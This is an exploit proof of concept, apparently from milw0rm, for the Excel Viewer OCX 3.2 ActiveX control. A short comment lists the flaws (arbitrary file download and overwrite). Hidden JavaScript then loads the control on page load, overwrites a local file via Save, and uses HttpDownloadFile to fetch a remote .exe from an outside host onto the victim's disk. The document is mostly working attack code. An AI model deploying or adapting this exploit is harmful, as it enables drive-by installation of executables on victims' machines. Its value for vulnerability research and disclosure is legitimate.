<html>
<body>
/*
--=0-0-000000000--x==-xxxxxxxxx<br/>
-
Excel Viewer OCX 3.2 <br/>
homepage: www.officeocx.com <br/>
download: www.brothersoft.com/excel-viewer-ocx-51797.html <br/>
- RegKey Safe for Script: True<br/>
- RegKey Safe for Init: True <br/>
- Implements IObjectSafety: True <br/>
- IDisp Safe: Safe for untrusted: caller,data <br/>
- IPersist Safe: Safe for untrusted: caller,data <br/>
- IPStorage Safe: Safe for untrusted: caller,data <br>
- Tested on Avant Browser 11.7.21 ie 6
<br/>
Vuln: <br/>
1) Arbitrary File Download [HttpDownloadFile]<br/>
2) Arbitrary file owerwrite [Save] <br/>
<br/>
--==0-0000000011011110=== <br/>
Propably it worst apps i ever see <br/>
this is funy that It is meant as Safe for scripting <br/>
They want sell it l0l <br/>
---000----------++++---------------000 <br/>
Alfons Luja <br/>
Pozdrawiam swoich fanóF <br/>
9002 <br/>
:P <br/>
00 -0000000000000000===------------------x <br/>
*/<br/>
<div style="visibility:hidden;">
<object classid='clsid:18A295DA-088E-42D1-BE31-5028D7F9B965' id='kupa'></object>
<script type="text/javascript">
/*
I dont know why but this code act correct only first time
later it just crash ie
In avant browser always is ok but it is necessary to wait a lot time
to finsh loading
- strange :x
*/
try{
var obj = document.getElementById('kupa');
var rem = "http://www.adalex.pl/motyl/motyl-radio.exe";
var loc = "C:\evil.exe";
obj.Save("C:\owerwrite.ini");
obj.HttpDownloadFile(rem,loc);
}
catch(err){
window.alert('Poc failed');
}
</script>
</div>
</body>
</html>
# milw0rm.com |
